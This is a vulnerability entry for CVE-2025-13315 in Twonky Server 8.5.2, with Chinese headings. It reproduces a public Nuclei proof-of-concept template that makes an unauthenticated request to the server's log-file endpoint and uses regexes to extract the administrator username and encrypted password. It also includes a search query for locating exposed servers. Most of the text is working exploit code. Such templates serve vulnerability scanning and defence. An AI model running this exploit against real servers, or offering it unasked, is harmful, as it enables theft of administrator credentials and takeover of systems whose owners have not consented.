漏洞描述
Twonky Server 8.5.2 contains a broken access control vulnerability caused by bypassing web service API authentication, letting unauthenticated attackers read log files with administrator credentials, exploit requires no authentication
CVE-2025-13315: Twonky Server 8.5.2 on Linux and Windows - Log File Exposure
PoC代码[已公开]
id: CVE-2025-13315
info:
name: Twonky Server 8.5.2 on Linux and Windows - Log File Exposure
author: pussycat0x
severity: critical
description: |
Twonky Server 8.5.2 contains a broken access control vulnerability caused by bypassing web service API authentication, letting unauthenticated attackers read log files with administrator credentials, exploit requires no authentication
impact: |
Unauthenticated attackers can read sensitive log files containing administrator usernames and encrypted passwords.
reference:
- https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/
metadata:
verified: true
zoomeye-query: app="Twonky Server"
tags: cve,cve2025,twonky,server,exposure,unauth
http:
- method: GET
path:
- "{{BaseURL}}/nmc/rpc/log_getfile"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body,"server_main_impl","LOG_SYSTEM:","upnp_ini_file")'
condition: and
extractors:
- type: regex
name: username
group: 1
part: body
regex:
- 'accessuser =([ a-zA-Z0-9]+)'
internal: true
- type: regex
name: password
part: body
group: 1
regex:
- 'accesspwd =([ :a-zA-Z0-9]+)'
internal: true
- type: dsl
dsl:
- '"Username :"+ trim(username, "[ ]")'
- '"EncryptedPassword :"+ trim(password, "[ ]")'
# digest: 490a00463044022026f84abc20c01fe0bf585ae38796fd4a924f723858d5db69f63b57a991322679022042a183363ad913a0d0a392fbce290dd06ada79a7458fbb4904704d5f0b639749:922c64590222798bb761d5b6d8e72950